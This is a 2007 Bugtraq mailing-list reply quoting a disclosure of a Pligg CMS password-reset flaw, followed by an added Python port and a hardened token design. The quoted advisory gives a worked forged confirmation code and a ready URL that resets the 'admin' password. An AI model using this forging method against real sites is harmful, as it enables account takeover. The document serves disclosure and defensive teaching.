Message-ID: <41011d980705252357t96a4c52yecc38c7c1bcf2204@mail.gmail.com>
Date: Sat, 26 May 2007 12:27:54 +0530
From: "crazy frog crazy frog" <i.m.crazy.frog@...il.com>
To: "242th section" <242th.section@...il.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Pligg critical vulnerability
Have you notified the Pligg developers? I think they have a well-defined
policy for disclosure?
On 5/25/07, 242th section <242th.section@...il.com> wrote:
> Pligg critical vulnerability
>
> Concerned version: 9.5 and ?
>
> Description:
>
> Pligg is a flexible CMS based on PHP and MySQL.
>
> To reinitialize a forgotten password, Pligg follows a classical
> process. A confirmation code is generated and sent by email to the
> concerned user mail box. The user has to follow the link containing
> the confirmation code and if the confirmation code is checked
> successfully, the password is reinitialized to a pre-defined value.
>
>
> you can find a part of the source code in charge of this check below:
>
> WEB_ROOT/libs/html1.php
>
> […]
>
> function generateHash($plainText, $salt = null){
>     if ($salt === null) {
>         $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
>     } else {
>         $salt = substr($salt, 0, SALT_LENGTH);
>     }
>     return $salt . sha1($salt . $plainText);
> }
>
> […]
>
> WEB_ROOT/login.php :
>
> […]
>
> $confirmationcode = $_GET["confirmationcode"];
>
> if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))
>     == $confirmationcode){
>
>     $db->query('UPDATE `' . table_users . '` SET `user_pass` =
>         "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`
>         = "'.$username.'"');
>
> […]
>
>
>
> Unfortunately, as you can read, you can easily generate, for a given
> username, a confirmation code that successfully passes the following
> check "if(generateHash($username, substr($confirmationcode, 0,
> SALT_LENGTH)) == $confirmationcode)"
>
>
> Example:
>
>
> Let's choose:
> salt = 123456789
>
> and,
>
> username = admin
>
> we have:
>
> sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7
>
> and thus:
>
> confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
> with the following URL you can reinitialize the user admin password:
>
>
> http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
>
> 242th.section.
>
--
---------------------------------------
http://www.secgeeks.com
get a blog on SecGeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secradar.com/node/feed
http://www.newskicks.com
Submit and kick for new stories from all around the world.
---------------------------------------
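The root cause in the quoted advisory is that the confirmation code is verified against itself: the salt is read from the submitted code and the only other input is the public username, so the server never consults any secret or stored state. The following is an added example, not code from Pligg or from the advisory: it ports the quoted generateHash()/login.php logic to Python so the flaw can be reproduced with the list's own worked values, and puts a hardened reset-token design next to it (random token issued server-side, hashed at rest, expiring, single-use, compared in constant time). The hardened part goes beyond the post, which only reports the flaw. Assumptions: SALT_LENGTH is taken as 9 because the advisory's example uses a 9-character salt (Pligg's real constant is not shown), and ResetTokenStore is an in-memory stand-in for a database table.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# Assumed value: the advisory does not show Pligg's SALT_LENGTH constant.
# The worked example on the list uses a 9-character salt, so 9 is used here.
SALT_LENGTH = 9


# --- Vulnerable scheme: Python port of the quoted generateHash()/login.php logic ---

def generate_hash(plain_text: str, salt: Optional[str] = None) -> str:
    """Port of Pligg's generateHash(): salt prefix + sha1(salt + plaintext).
    The random-salt branch stands in for md5(uniqid(rand(), true))."""
    if salt is None:
        salt = hashlib.md5(secrets.token_hex(16).encode()).hexdigest()[:SALT_LENGTH]
    else:
        salt = salt[:SALT_LENGTH]
    return salt + hashlib.sha1((salt + plain_text).encode()).hexdigest()


def vulnerable_check(username: str, confirmation_code: str) -> bool:
    """Port of the login.php check. The salt is read from the submitted code
    itself and the username is public, so no server-side secret or stored
    state is involved: any code built the same way passes this test."""
    expected = generate_hash(username, confirmation_code[:SALT_LENGTH])
    return expected == confirmation_code


# --- Hardened scheme: unguessable token stored server-side, expiring, single use ---

class ResetTokenStore:
    """In-memory stand-in for a reset_tokens table (constructed for this example).
    Maps username -> (sha256(token), expiry time)."""

    def __init__(self, ttl_seconds: int = 3600) -> None:
        self._tokens: Dict[str, Tuple[str, float]] = {}
        self.ttl = ttl_seconds

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username: str, now: Optional[float] = None) -> str:
        """Create the token for the mailed link. Only its hash is persisted,
        so a read of the stored table does not yield usable tokens."""
        token = secrets.token_urlsafe(32)
        expires = (time.time() if now is None else now) + self.ttl
        self._tokens[username] = (self._digest(token), expires)
        return token

    def verify(self, username: str, token: str, now: Optional[float] = None) -> bool:
        """Accept the token only if it was issued for this user, is unexpired
        and has not been used. Comparison is constant-time; a used or expired
        token is discarded."""
        entry = self._tokens.get(username)
        if entry is None:
            return False
        stored_digest, expires = entry
        if (time.time() if now is None else now) > expires:
            del self._tokens[username]
            return False
        ok = hmac.compare_digest(stored_digest, self._digest(token))
        if ok:
            del self._tokens[username]  # single use
        return ok


def demonstrate() -> Dict[str, bool]:
    """Run the list's worked example (salt 123456789, user admin) against both schemes."""
    forged = generate_hash("admin", "123456789")  # built from public inputs only
    store = ResetTokenStore(ttl_seconds=60)
    mailed = store.issue("admin", now=1000.0)
    return {
        "vulnerable_accepts_forged": vulnerable_check("admin", forged),
        "hardened_rejects_forged": not store.verify("admin", forged, now=1001.0),
        "hardened_accepts_mailed": store.verify("admin", mailed, now=1001.0),
        "hardened_rejects_reuse": not store.verify("admin", mailed, now=1002.0),
    }


if __name__ == "__main__":
    for name, result in demonstrate().items():
        print(f"{name}: {result}")
```

The design point is that a reset link must carry something the server remembers and the requester cannot compute: here a 256-bit random token whose hash is stored per user, which the verifier looks up rather than recomputes. Expiry and single use limit the window in which a leaked mailbox or log line is useful, and compare_digest avoids leaking the stored digest through timing. A fixed post-reset password, as in the quoted UPDATE statement, should likewise be replaced by letting the user choose a new one in the same authenticated step.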